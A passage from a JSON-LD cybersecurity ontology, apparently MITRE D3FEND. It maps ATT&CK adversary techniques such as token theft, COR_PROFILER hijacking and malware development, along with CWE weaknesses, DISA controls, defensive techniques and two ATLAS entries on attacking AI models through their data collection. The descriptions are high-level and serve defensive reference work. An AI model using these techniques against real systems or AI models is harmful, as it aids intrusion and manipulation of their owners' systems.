      "d3f:definition": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)",
      "rdfs:label": "Component Object Model",
      "rdfs:subClassOf": {
        "@id": "d3f:T1559"
      }
    },
    {
      "@id": "d3f:CWE-47",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-47",
      "d3f:definition": "The product accepts path input in the form of leading space (' filedir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: ' filename' (Leading Space)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:T1528",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:AccessToken"
      },
      "d3f:attack-id": "T1528",
      "d3f:definition": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.",
      "rdfs:label": "Steal Application Access Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Ncb7a000c5a5a4cf99bdd935a2002f130"
        }
      ]
    },
    {
      "@id": "_:Ncb7a000c5a5a4cf99bdd935a2002f130",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:hides",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x hides y: A technique or operation x conceals the digital artifact y.",
      "rdfs:label": "hides",
      "rdfs:range": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-761",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-761",
      "d3f:definition": "The product calls free() on a pointer to a memory resource that was allocated on the heap, but the pointer is not at the start of the buffer.",
      "d3f:weakness-of": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "rdfs:label": "Free of Pointer not at Start of Buffer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-763"
        },
        {
          "@id": "_:N7df7ff0ea6fa4969bed12b320795a567"
        }
      ]
    },
    {
      "@id": "_:N7df7ff0ea6fa4969bed12b320795a567",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:StaticAnalysisTool",
      "@type": "owl:Class",
      "d3f:definition": "A static [program] analysis tool performs an automated analysis of computer software without actually executing programs, in contrast with dynamic analysis, which is analysis performed on programs while they are executing. In most cases the analysis is performed on some version of the source code, and in the other cases, some form of the object code.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Static_program_analysis"
      },
      "rdfs:label": "Static Analysis Tool",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Program_analysis"
        },
        {
          "@id": "dbr:Category:Program_analysis"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:CodeAnalyzer"
      },
      "skos:altLabel": "Static Program Analysis Tool"
    },
    {
      "@id": "d3f:LogisticRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LR",
      "d3f:definition": "Logistic regression is estimating the parameters of a logistic model.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Logistic regression. [Link](https://en.wikipedia.org/wiki/Logistic_regression)",
      "rdfs:label": "Logistic Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:OpticalModem",
      "@type": "owl:Class",
      "d3f:definition": "A modem that connects to a fiber optic network is known as an optical network terminal (ONT) or optical network unit (ONU). These are commonly used in fiber to the home installations, installed inside or outside a house to convert the optical medium to a copper Ethernet interface, after which a router or gateway is often installed to perform authentication, routing, NAT, and other typical consumer internet functions, in addition to \"triple play\" features such as telephony and television service.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Modem#Optical_modem"
      },
      "rdfs:label": "Optical Modem",
      "rdfs:subClassOf": {
        "@id": "d3f:Modem"
      }
    },
    {
      "@id": "d3f:T1598.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598.004",
      "d3f:definition": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.",
      "rdfs:label": "Spearphishing Voice",
      "rdfs:subClassOf": {
        "@id": "d3f:T1598"
      }
    },
    {
      "@id": "d3f:T1587.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587.001",
      "d3f:definition": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)",
      "rdfs:label": "Malware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1587"
      }
    },
    {
      "@id": "d3f:CWE-619",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-619",
      "d3f:definition": "If a database cursor is not closed properly, then it could become accessible to other users while retaining the same privileges that were originally assigned, leaving the cursor \"dangling.\"",
      "rdfs:label": "Dangling Database Cursor ('Cursor Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-402"
      }
    },
    {
      "@id": "d3f:CCI-000877_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs strong authenticators in the establishment of nonlocal maintenance and diagnostic sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000877"
    },
    {
      "@id": "d3f:T1155",
      "@type": "owl:Class",
      "d3f:attack-id": "T1155",
      "d3f:definition": "macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1059.002",
      "rdfs:label": "AppleScript",
      "rdfs:seeAlso": {
        "@id": "d3f:T1059.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:installs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x installs y: An entity x sets up digital artifact y for subsequent use.  For example, an installation program can install application software.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01572394-v"
      },
      "rdfs:label": "installs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:AML.TA0003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0003",
      "d3f:definition": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating,\npurchasing, or compromising/stealing resources that can be used to support targeting.\nSuch resources include AI artifacts, infrastructure, accounts, or capabilities.\nThese resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as [AI Attack Staging](/tactics/AML.TA0001).",
      "rdfs:label": "Resource Development - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Resource Development"
    },
    {
      "@id": "d3f:CCI-002411_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:IOPortRestriction"
        },
        {
          "@id": "d3f:Kernel-basedProcessIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability to dynamically isolate/segregate organization-defined information system components from other components of the system.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002411"
    },
    {
      "@id": "d3f:T1560.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1560.002",
      "d3f:creates": {
        "@id": "d3f:ArchiveFile"
      },
      "d3f:definition": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.",
      "rdfs:label": "Archive via Library",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1560"
        },
        {
          "@id": "_:N48d13e9752714b098a3ba9eed3e7e98d"
        }
      ]
    },
    {
      "@id": "_:N48d13e9752714b098a3ba9eed3e7e98d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ArchiveFile"
      }
    },
    {
      "@id": "d3f:AuthenticationCacheInvalidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AuthenticationCacheInvalidation"
      ],
      "d3f:d3fend-id": "D3-ANCI",
      "d3f:definition": "Removing tokens or credentials from an authentication cache to prevent further user associated account accesses.",
      "d3f:deletes": {
        "@id": "d3f:Credential"
      },
      "d3f:kb-article": "## How it works\nApplications can locally cache user authentication credentials for certain server connections. An application may attempt to use the cached credential for a connection. If the cached credentials exist then the user will not be typically prompted for new credentials.\n\n\n## Considerations\nAre these cached credentials only on the local host? Can they be persisted to the remote server?\n\n## Examples\nWindows Credential Management API",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-SecureCachingOfServerCredentials_DellProductsLP"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForProvidingAnActivelyInvalidatedClient-sideNetworkResourceCache_IMVU"
        }
      ],
      "rdfs:label": "Authentication Cache Invalidation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialEviction"
        },
        {
          "@id": "_:N5ba09852de20431bb927649ca59404b8"
        }
      ]
    },
    {
      "@id": "_:N5ba09852de20431bb927649ca59404b8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:CWE-50",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-50",
      "d3f:definition": "The product accepts path input in the form of multiple leading slash ('//multiple/leading/slash') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '//multiple/leading/slash'",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-161"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf"
      },
      "d3f:kb-abstract": "",
      "d3f:kb-author": "Cybersecurity and Infrastructure Security Agency",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Cybersecurity and Infrastructure Security Agency",
      "d3f:kb-reference-of": {
        "@id": "d3f:RegistryKeyDeletion"
      },
      "d3f:kb-reference-title": "Cybersecurity Incident & Vulnerability Response Playbooks",
      "rdfs:label": "Reference - Cybersecurity Incident and Vulnerability Response Playbooks"
    },
    {
      "@id": "d3f:CCI-001372_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, implements organization-defined security policy filters requiring fully enumerated formats that restrict data structure and content.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001372"
    },
    {
      "@id": "d3f:Reference-SAFESEH_ImageHasSafeExceptionHandlers_MicrosoftDocs",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/cpp/build/reference/safeseh-image-has-safe-exception-handlers?view=msvc-160"
      },
      "d3f:kb-abstract": "When /SAFESEH is specified, the linker will only produce an image if it can also produce a table of the image's safe exception handlers. This table specifies for the operating system which exception handlers are valid for the image.",
      "d3f:kb-author": "Mike Blome, Saisang Cai, Colin Robertson, Mike Jones, NextTurn, Gordon Hogenson",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExceptionHandlerPointerValidation"
      },
      "d3f:kb-reference-title": "/SAFESEH (Image has Safe Exception Handlers)",
      "rdfs:label": "Reference - /SAFESEH (Image has Safe Exception Handlers) - Microsoft Docs"
    },
    {
      "@id": "d3f:CWE-270",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-270",
      "d3f:definition": "The product does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control.",
      "rdfs:label": "Privilege Context Switching Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:T1574.012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:attack-id": "T1574.012",
      "d3f:definition": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "COR_PROFILER",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N1f025f6a7a4e4678b3c4ab9acda122c3"
        },
        {
          "@id": "_:N8f1b7ccb964048ffbd2d237af24d0e0f"
        }
      ]
    },
    {
      "@id": "_:N1f025f6a7a4e4678b3c4ab9acda122c3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N8f1b7ccb964048ffbd2d237af24d0e0f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:d3fend-kb-reference-annotation",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x d3fend-kb-data-property y: The reference x has the data property y.",
      "rdfs:domain": {
        "@id": "d3f:TechniqueReference"
      },
      "rdfs:label": "d3fend-kb-reference-annotation",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-annotation-property"
      }
    },
    {
      "@id": "d3f:InboundTrafficFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:InboundTrafficFiltering"
      ],
      "d3f:d3fend-id": "D3-ITF",
      "d3f:definition": "Restricting network traffic originating from untrusted networks destined towards a private host or enclave.",
      "d3f:filters": {
        "@id": "d3f:InboundNetworkTraffic"
      },
      "d3f:kb-article": "## How it works\nInbound Traffic, in this context, is network traffic originating from an untrusted network towards a private host or enclave.\nFor example:\n\n* An untrusted network host connecting to a internal commercial portal, shopping.example.com\n* An external mail server connecting to an internal mail server, mail.example.com\n\nFiltering policies are developed by administrators to meet business requirements and limit connectivity. These policies are implemented on edge devices such as firewalls, routers, and intrusion prevention systems. Examples of filters:\n\n* Blocking incoming traffic from spoofed internally facing IP addresses\n* Blocking specific ports and services from establishing connections\n* Limiting specific IP ranges from connecting to the network\n* Dynamic inbound filtering (Hole punching, STUN, NAT-T)\n\n## Considerations\n* Business requirements typically drive the development of filtering rulesets\n* Protocols using non-standard ports may circumvent filtering technology, which does not detect application protocol based on traffic content\n\n## Implementations\n* OpenWRT (Embedded)\n* Netfilter (Linux)\n* Windows Firewall\n* pf(BSD)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ActiveFirewallSystemAndMethodology_McAfeeLLC"
        },
        {
          "@id": "d3f:Reference-AutomaticallyGeneratingRulesForConnectionSecurity_Microsoft"
        },
        {
          "@id": "d3f:Reference-FWTK-FirewallToolkit_"
        },
        {
          "@id": "d3f:Reference-FirewallForInterentAccess_SecureComputingLLC"
        },
        {
          "@id": "d3f:Reference-FirewallForProcessingAConnectionlessNetworkPacket_NationalSecurityAgency"
        },
        {
          "@id": "d3f:Reference-FirewallForProcessingConnection-orientedAndConnectionlessDatagramsOverAConnection-orientedNetwork_NationalSecurityAgency"
        },
        {
          "@id": "d3f:Reference-FirewallsThatFilterBasedUponProtocolCommands_IntelCorp"
        },
        {
          "@id": "d3f:Reference-MethodForControllingComputerNetworkSecurity_CheckpointSoftwareTechnologiesLtd"
        },
        {
          "@id": "d3f:Reference-NetworkFirewallWithProxy_SecureComputingLLC"
        }
      ],
      "rdfs:label": "Inbound Traffic Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficFiltering"
        },
        {
          "@id": "_:N07bdb26ce5a848e49cf0e209f9f8ce77"
        }
      ]
    },
    {
      "@id": "_:N07bdb26ce5a848e49cf0e209f9f8ce77",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundNetworkTraffic"
      }
    },
    {
      "@id": "d3f:WindowsTerminateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Terminates the specified process and all of its threads.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtTerminateProcess"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-terminateprocess"
      },
      "rdfs:label": "Windows TerminateProcess",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPITerminateProcess"
        },
        {
          "@id": "_:N0f1e3be120374e40a0f152d5aba15d85"
        }
      ]
    },
    {
      "@id": "_:N0f1e3be120374e40a0f152d5aba15d85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtTerminateProcess"
      }
    },
    {
      "@id": "d3f:Reference-ComputationalModelingAndClassificationOfDataStreams_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180197089A1/en?oq=US-2018197089-A1"
      },
      "d3f:kb-abstract": "Example techniques described herein determine a signature or classification of a data stream such as a file. The classification can indicate whether the data stream is associated with malware. A processor can locate training analysis regions of training data streams based on predetermined structure data, and determining training model inputs based on the training analysis regions. The processor can determine a computational model based on the training model inputs. The computational model can receive an input vector and provide a corresponding feature vector. The processor can then locate a trial analysis region of a trial data stream based on the predetermined structure data and determine a trial model input. The processor can operate the computational model based on the trial model input to provide a trial feature vector, e.g., a signature. The processor can operate a second computational model to provide a classification based on the signature.",
      "d3f:kb-author": "Sven Krasser; David Elkind; Patrick Crenshaw; Brett Meyer",
      "d3f:kb-mitre-analysis": "Provides a mechanism to classify files using file signatures based on a computational model. Training data that comprises at least a portion of a file, e.g. number of bytes, is used as input to the computational model to develop a file signature and classify the file as malware.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:kb-reference-title": "Computational modeling and classification of data streams",
      "rdfs:label": "Reference - Computational modeling and classification of data streams - Crowdstrike Inc"
    },
    {
      "@id": "d3f:DefensiveAction",
      "@type": "owl:Class",
      "rdfs:label": "Defensive Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CyberAction"
      }
    },
    {
      "@id": "d3f:CWE-1057",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1057",
      "d3f:definition": "The product uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager.",
      "rdfs:label": "Data Access Operations Outside of Expected Data Manager Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:SatelliteTransponder",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A communications satellite's transponder is the series of interconnected units that form a communications channel between the receiving and the transmitting antennas.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Transponder_(satellite_communications)"
      },
      "rdfs:label": "Satellite Transponder",
      "rdfs:subClassOf": {
        "@id": "d3f:Transponder"
      }
    },
    {
      "@id": "d3f:CWE-479",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-479",
      "d3f:definition": "The product defines a signal handler that calls a non-reentrant function.",
      "rdfs:label": "Signal Handler Use of a Non-reentrant Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-663"
        },
        {
          "@id": "d3f:CWE-828"
        }
      ]
    },
    {
      "@id": "d3f:NetworkResourceAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:NetworkResource"
        },
        {
          "@id": "d3f:Resource"
        }
      ],
      "d3f:definition": "Ephemeral digital artifact comprising a request of a network resource and any response from that network resource.",
      "rdfs:label": "Network Resource Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ResourceAccess"
        },
        {
          "@id": "_:N688ed6849e0a4e3c92ade407e268bfe8"
        },
        {
          "@id": "_:Nf60602bfe91c486eb31199cbf1ae1290"
        }
      ]
    },
    {
      "@id": "_:N688ed6849e0a4e3c92ade407e268bfe8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "_:Nf60602bfe91c486eb31199cbf1ae1290",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:CWE-1246",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1246",
      "d3f:definition": "The product does not implement or incorrectly implements wear leveling operations in limited-write non-volatile memories.",
      "rdfs:label": "Improper Write Handling in Limited-write Non-Volatile Memories",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:SystemCall",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. This may include hardware-related services (for example, accessing a hard disk drive), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.",
      "d3f:executes": {
        "@id": "d3f:Subroutine"
      },
      "d3f:synonym": "syscall",
      "rdfs:isDefinedBy": {
        "@id": "dbr:System_call"
      },
      "rdfs:label": "System Call",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nb5b3dbe39beb41dbb6caaf43a8b2148b"
        }
      ]
    },
    {
      "@id": "_:Nb5b3dbe39beb41dbb6caaf43a8b2148b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CWE-111",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-111",
      "d3f:definition": "When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.",
      "rdfs:label": "Direct Use of Unsafe JNI",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:CWE-396",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-396",
      "d3f:definition": "Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.",
      "rdfs:label": "Declaration of Catch for Generic Exception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-221"
        },
        {
          "@id": "d3f:CWE-705"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:T1136.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1136.001",
      "d3f:creates": {
        "@id": "d3f:LocalUserAccount"
      },
      "d3f:definition": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.",
      "rdfs:label": "Local Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1136"
        },
        {
          "@id": "_:N4c90b4e7726248f1a9b8f2d828283e8c"
        }
      ]
    },
    {
      "@id": "_:N4c90b4e7726248f1a9b8f2d828283e8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:T1219",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1219",
      "d3f:definition": "An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Remote Access Tools",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:Nd9798ecfa3984737bd32fe3cf93dcbd5"
        }
      ]
    },
    {
      "@id": "_:Nd9798ecfa3984737bd32fe3cf93dcbd5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:issued",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date of formal issuance of the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date issued"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:AML.T0041",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0041",
      "d3f:definition": "In addition to the attacks that take place purely in the digital domain, adversaries may also exploit the physical environment for their attacks.\nIf the model is interacting with data collected from the real world in some way, the adversary can influence the model through access to wherever the data is being collected.\nBy modifying the data in the collection process, the adversary can perform modified versions of attacks designed for digital access.",
      "rdfs:label": "Physical Environment Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0041"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIModelAccessTechnique"
      },
      "skos:prefLabel": "Physical Environment Access"
    },
    {
      "@id": "d3f:WindowsNtCreateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtCreateProcess",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-614",
